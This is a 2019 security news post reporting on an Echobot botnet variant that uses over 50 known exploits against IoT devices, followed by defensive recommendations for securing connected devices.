Updated on August 27, 2019 at 8:52 PM PST to add solution rules.
Another Mirai offshoot spotted: A variant of the Echobot botnet was found using over 50 exploits that lead to remote code execution (RCE), arbitrary command execution, and command injection in internet of things (IoT) devices.
Security researcher Carlos Brendel Alcañiz first tweeted about the different exploits the variant uses to propagate. The payloads dropped by the malware show that the operator behind the variant relies on old and known exploits, some of them dating back to 2010. Moreover, the code used is available in multiple public exploit repositories.
The malware dropper was reportedly hosted on an open server, in a file called Richard. What’s particularly noteworthy about the variant is that the exploits it uses do not target specific types of products or devices. BleepingComputer lists the wide range of devices the variant can affect, which includes network attached storage (NAS) devices, routers, security cameras, smart home hubs. The full list of exploits used by this particular Echobot variant is listed here.
The number of payloads may be high, but this should not come as a surprise given that the Mirai malware’s source code was leaked in 2016. Malware authors have since come up with different variantsandderivatives for campaigns that compromised many connected devices, usually through default or weak credentials.
Discovered by Palo Alto Networks researchers, Echobot was initially found using 18 exploits, followed by an Akamai report that described it incorporating 26 exploits. Trend Micro also reported about an Echobot variant that targets routers and other IoT devices with multiple exploits. The particular variant takes advantage of multiple publicly available proofs of concepts (PoCs) and Metasploit modules.
Securing connected devices against Mirai and its offshoots
Malware authors have been putting their own spin on the infamous IoT malware since its discovery in 2016. Many botnets have since cropped up to attack devices, and this will likely continue. Based on related malicious activities in the past, hackers usually rely on attacking unpatched devices and those that use default settings and credentials. While device manufacturers play important roles in securing the devices, users and enterprises should also adopt best practices for added protection, such as:
Regularly updating devices and changing access credentials
Configuring the router’s settings to deter potential intrusions
Disabling outdated and unused device components
Enabling the auto-update feature if the device allows it
Encrypting the connections that the devices use
Incorporating security tools that provide additional protection to home networks and devices connected to them
Using only legitimate applications from trusted sources and stores